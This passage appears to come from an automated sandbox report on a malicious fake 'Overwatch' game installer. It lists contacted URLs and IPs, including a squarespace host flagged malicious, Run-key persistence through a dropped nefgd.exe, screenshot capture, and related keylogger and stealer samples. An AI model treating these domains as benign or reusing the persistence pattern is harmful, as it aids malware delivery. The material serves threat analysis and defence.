https://plantain-elk-b8pt.squarespacdr(	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd6m	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	nefgd.exe, 00000004.00000002.2461942040.0000000002B50000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000004.00000002.2461942040.0000000002B8A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://plantain-elk-b8pt.squarespacd.Z	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.microsoft.LinkId=42127	Overwatch-Installer.exe, 00000000.00000002.4463340564.0000000001198000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdJ#	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdrD	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdb5	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdR&	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdzO	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespace.com$	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000405A000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.00000000040A4000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000003C32000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000402D000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000003C9C000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000403C000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000003C7B000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000004057000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000409F000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000404E000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000403F000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000004076000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000406F000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000003CB9000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000406B000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.0000000004060000.00000004.00000800.00020000.00000000.sdmp, nefgd.exe, 00000003.00000002.4464189616.000000000400C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd.w	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdzE	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdj6	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdz;	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdRL	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdrl	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://plantain-elk-b8pt.squarespacdB=	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd2.	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.google.com/get/noto/	Overwatch-Installer.exe, nefgd.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdBA	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdRB	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdzj	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://DynDns.com	Overwatch-Installer.exe, nefgd.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdB3	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdR;	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdbQ	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://Paltalk.com	Overwatch-Installer.exe, nefgd.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdB%	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdrW	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdbH	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdZt	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdJe	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdJg	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespace.com	nefgd.exe, 00000003.00000002.4464189616.0000000003631000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd:X	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdRq	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd2E	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdbu	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd:O	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdrz	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdJK	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdrs	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdbe	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdRV	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdBG	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdZ	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp, Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://plantain-elk-b8pt.squarespacdv/	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd~9	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdv5	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdR	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp, Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://plantain-elk-b8pt.squarespacd:l	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacd:n	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdV	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://plantain-elk-b8pt.squarespacdJ	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://plantain-elk-b8pt.squarespacdJs	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.microsoft.	Overwatch-Installer.exe, 00000000.00000002.4463340564.0000000001198000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://plantain-elk-b8pt.squarespacdN	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003914000.00000004.00000800.00020000.00000000.sdmp, Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://plantain-elk-b8pt.squarespacd2a	Overwatch-Installer.exe, 00000000.00000002.4464144323.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.185.159.177	plantain-elk-b8pt.squarespace.com	United States		53831	SQUARESPACEUS	true
193.122.6.168	checkip.dyndns.com	United States		31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502487
Start date and time:	2024-09-01 22:02:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Overwatch-Installer.exe
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@5/5@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 397 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
16:03:16	API Interceptor	1772798x Sleep call for process: Overwatch-Installer.exe modified
16:03:43	API Interceptor	1142597x Sleep call for process: nefgd.exe modified
22:03:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MyOtApp C:\Users\user\AppData\Roaming\nefgd\nefgd.exe
22:03:25	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MyOtApp C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
198.185.159.177	http://round-puma-h6za.squarespace.com	Get hash	malicious	Unknown	Browse	round-puma-h6za.squarespace.com/
	http://scarlet-marigold-h469.squarespace.com/	Get hash	malicious	Unknown	Browse	scarlet-marigold-h469.squarespace.com/
	http://keyboard-shark-m4hp.squarespace.com	Get hash	malicious	Unknown	Browse	keyboard-shark-m4hp.squarespace.com/
	http://sawfish-tarantula-b6ce.squarespace.com	Get hash	malicious	Unknown	Browse	sawfish-tarantula-b6ce.squarespace.com/
	http://lemon-tarantula-m9jf.squarespace.com/	Get hash	malicious	Unknown	Browse	lemon-tarantula-m9jf.squarespace.com/
	http://parrotfish-haddock-afyx.squarespace.com/	Get hash	malicious	Unknown	Browse	parrotfish-haddock-afyx.squarespace.com/
	http://lemon-tarantula-m9jf.squarespace.com/	Get hash	malicious	Unknown	Browse	lemon-tarantula-m9jf.squarespace.com/
	http://pufferfish-plums-7rn7.squarespace.com/	Get hash	malicious	Unknown	Browse	pufferfish-plums-7rn7.squarespace.com/
	http://ellipsoid-bell-lasy.squarespace.com	Get hash	malicious	Unknown	Browse	ellipsoid-bell-lasy.squarespace.com/
	http://guppy-groundhog-kry7.squarespace.com/	Get hash	malicious	HTMLPhisher	Browse	guppy-groundhog-kry7.squarespace.com/
193.122.6.168	snake.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	snake.mal.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	LEK1JCI81P.exe	Get hash	malicious	RedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWorm	Browse	checkip.dyndns.org/
	INQUIRY.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Nettably.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Offer 2024-30496.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	pagamento.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	RFQ-MR-24-09101 SPS.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	snake.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	NordVPNInstaller.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	132.226.247.73
	librewolf-124.0.2-1-windows-x86_64-setup.exe	Get hash	malicious	Agent Tesla, AgentTesla, HTMLPhisher	Browse	158.101.44.242
	snake.mal.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	snake.mal.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	LEK1JCI81P.exe	Get hash	malicious	RedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWorm	Browse	193.122.6.168
	Invoice-2238562.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	INQUIRY.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	SWIFT COPIES.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
plantain-elk-b8pt.squarespace.com	NordVPNInstaller.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	198.185.159.177
plantain-elk-b8pt.squarespace.com	librewolf-124.0.2-1-windows-x86_64-setup.exe	Get hash	malicious	Agent Tesla, AgentTesla, HTMLPhisher	Browse	198.185.159.177

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	snake.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	librewolf-124.0.2-1-windows-x86_64-setup.exe	Get hash	malicious	Agent Tesla, AgentTesla, HTMLPhisher	Browse	158.101.44.242
	snake.mal.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	snake.mal.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	LEK1JCI81P.exe	Get hash	malicious	RedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWorm	Browse	193.122.6.168
	https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1	Get hash	malicious	HTMLPhisher	Browse	147.154.52.189
	INQUIRY.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	SWIFT COPIES.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Nettably.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
SQUARESPACEUS	NordVPNInstaller.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	198.185.159.177
	librewolf-124.0.2-1-windows-x86_64-setup.exe	Get hash	malicious	Agent Tesla, AgentTesla, HTMLPhisher	Browse	198.185.159.177
	WhaleInstall.exe	Get hash	malicious	Unknown	Browse	198.185.159.144
	Etisalat Summary Bill for the Month of August.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	https://rebrand.ly/340957	Get hash	malicious	Unknown	Browse	198.185.159.177
	http://round-puma-h6za.squarespace.com	Get hash	malicious	Unknown	Browse	198.185.159.177
	WebAdvisorInstall.exe	Get hash	malicious	LockBit ransomware	Browse	198.185.159.144
	F-Secure-Safe-Network-Installer.exe	Get hash	malicious	LockBit ransomware	Browse	198.185.159.144
	pkgconsole.exe	Get hash	malicious	AsyncRAT, Discord Token Stealer, MicroClip, RedLine	Browse	198.185.159.144
	bof.exe	Get hash	malicious	LockBit ransomware, PureLog Stealer, RedLine, zgRAT	Browse	198.185.159.144

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	NordVPNInstaller.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	198.185.159.177
	librewolf-124.0.2-1-windows-x86_64-setup.exe	Get hash	malicious	Agent Tesla, AgentTesla, HTMLPhisher	Browse	198.185.159.177
	LEK1JCI81P.exe	Get hash	malicious	RedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWorm	Browse	198.185.159.177
	Invoice-2238562.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	198.185.159.177
	INQUIRY.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	198.185.159.177
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	198.185.159.177
	SWIFT COPIES.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	198.185.159.177
	Nettably.exe	Get hash	malicious	Snake Keylogger	Browse	198.185.159.177
	Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	198.185.159.177
	Offer 2024-30496.exe	Get hash	malicious	Snake Keylogger	Browse	198.185.159.177

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	7658
Entropy (8bit):	3.7009406996702485
Encrypted:	false
SSDEEP:	192:R6l7wVeJ996VTy6YEIHSUYgmfusuQsp13a1fz9m:R6lXJH6E6YEISUYgmfQQQ3wfk
MD5:	2B37F096B99393A0DD05F7B26B1BEDF5
SHA1:	D5101EDBA44652BCB82405FBD8322A4E8FBF2E37
SHA-256:	5A5D663896716FAF6C5229D094BF037A13581B78C57A5BA8AABEAB099E8977CB
SHA-512:	BD33DE3B78DA883120534C660C08053E52D0685A77612304A739A66CC4D564A7778B1B5B2A0332E1E69A81DB6EDFD42B80E2FF9152A7806349C4431CD9E86D6E
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE9D.tmp.xml

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4558
Entropy (8bit):	4.450388890053515
Encrypted:	false
SSDEEP:	48:cvIwWl8zsMJg77aI9p+WpW8VYdYm8M4JFKfJuTFpF7+q8reFvpKcQIcQiSRSfd:uIjfKI7L/7VJJFKiFXrFhKkFMfd
MD5:	1999EDFD104EFDC4D1D8A6A8B4A66F6F
SHA1:	99B8B24C275472BEAC193EFF572A1A5942C55C10
SHA-256:	54943FF5745727957C5D0F97A89F2F2E56A240F8A81D859544E8928AB8512C4C
SHA-512:	8EFC149D6D841DE2BD7C8872082AB2E6576A2BEE7E357CCCE704D04EAEA315A9CD4F5EA384847F2782ABC0248E4DCD837268328F7556A3E79DD2D3890AA5EA43
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="481629" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Roaming\ScreenShot\screen.jpeg

Download File

Process:	C:\Users\user\Desktop\Overwatch-Installer.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	modified
Size (bytes):	59003
Entropy (8bit):	7.609329547069446
Encrypted:	false
SSDEEP:	1536:bHOwWQaVzs9pfm+cGmeW/mI/0RwD9nlV5IUTG827e:bpWQsI9Fm//Qmr5IUq8p
MD5:	400B4D11E1F95A27FF365DD57686992C
SHA1:	69F913FC5BC980BF9C582A1B98E8CD227732774B
SHA-256:	B15D9B7CBF0EF3EE7B4D6DADC7789EE5AFE0BF756E6129C59E5E3DB7374E221A
SHA-512:	F993A48F1825D60A27935D649A3537D17511BA2511303917F69C6AC8FAEC79B7E48A9A808858F0676A424FE641AD86272AF81EBFA43D131CF814CAF3B94F3A4D
Malicious:	false
Reputation:	low
